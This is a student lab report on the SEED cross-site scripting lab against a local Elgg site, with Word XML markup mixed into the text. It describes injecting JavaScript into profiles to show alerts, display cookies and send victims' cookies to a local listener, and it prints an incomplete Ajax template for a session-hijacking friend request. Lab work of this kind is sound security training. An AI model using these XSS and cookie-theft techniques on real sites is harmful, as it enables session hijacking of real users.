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Matthew Austin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Web Development Security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Yi Yang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November 2018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Lab 3 Report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3.2. Lab Tasks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2.1 Environment Configuration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To access the ELGG application, we need to first start the apache service.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12547" cy="36337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547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After ensuring that the virtual host is created for xsslabelgg.com in the /etc/apache2/sites- available folder I will be able to access the site as shown below.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72138" cy="437601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37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3. Lab Tasks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3.1 Task 1 Posting a Malicious Message to Display an Alert Window</w:t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The first method is by embedding JavaScript program in the Elgg profile as follows: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1285875</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>638175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4281488" cy="3301388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301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output is shown below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29711" cy="358616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711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second method is saving the script information in a separate JavaScript file and link the file in the description as follows:</w:t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62055" cy="25479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055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3.2 Task 2 Posting a Malicious Message to Display Cookies</w:t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we need to steal the cookies from the webpage. The cookie value should be displayed as a popup.</w:t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03778" cy="37957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778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10876" cy="380523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876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3.3 Task 3 Stealing cookies from Victim’s Profile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019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we try to steal cookies from the Victim’s profile by hosting an image on the local host with port# 5555. Then, we embed that in the brief description of the profile.</w:t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15613" cy="37766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613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28419" cy="5572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419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Every activity is seen and captured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3.4 Task 4 Session Hijacking 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Adding code to Alice's Brief Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F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&lt;script type="text/javascript"&gt;</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">window.onload = function () {</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">var Ajax=null;</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">var ts="&amp;__elgg_ts="+elgg.security.token.__elgg_ts; ➀</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">SEED Labs – Cross-Site Scripting Attack Lab 5</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">var token="&amp;__elgg_token="+elgg.security.token.__elgg_token; ➁</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//Construct the HTTP request to add Samy as a friend.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">var sendurl=...; //FILL IN</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//Create and send Ajax request to add friend</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Ajax=new XMLHttpRequest();</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Ajax.open("GET",sendurl,true);</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Ajax.setRequestHeader("Host","www.xsslabelgg.com");</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Ajax.send();</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">}</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020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We are then able to automatically become samy’s friend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021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97605" cy="23860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605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